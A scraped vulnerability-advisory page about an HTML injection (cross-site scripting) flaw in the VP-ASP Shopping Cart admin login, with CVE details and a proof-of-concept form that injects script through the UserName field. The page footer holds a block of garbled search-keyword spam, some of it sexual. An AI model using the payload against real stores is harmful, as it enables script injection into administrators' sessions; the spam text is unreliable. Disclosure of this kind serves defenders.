about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability


Title VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
Published 2005-11-17-12:00AM
Updated 2005-11-17-10:42PM
Class Input Validation Error
CVE   CAN-2005-3685
Remote  Yes
Local  No
Credit  ConcorDHacK is credited with the discovery of this vulnerability.
Vulnerable  VPASP Shopping Cart
Not Vulnerable  
Code   No exploit is required.

Proof of concept code has been provided:

<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 13:53:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
php-nuke 2 Www play b xxx sex news for c Sexiphoto. Sex poto t443t XXX photos news for c news for C mambo Remo girl first mambo Remo Aishwarya news searc www.sex oc Www sexyvi results on Autos tune news for c Shakhilase mambo Remo www.kmlaob news for c Download s G-2000 PLU mambo Remo news for c sgi lahorsex.c www.linkci news for c all cartoo Www 18 yea www.RARBG. Nfs news for c 200 /compo Www.sexytr news for C MOM SON SE Www.Al4A.C x videos.c PHP Advanc 200 /compo Powered by Powered by t71t www.zhongl news for c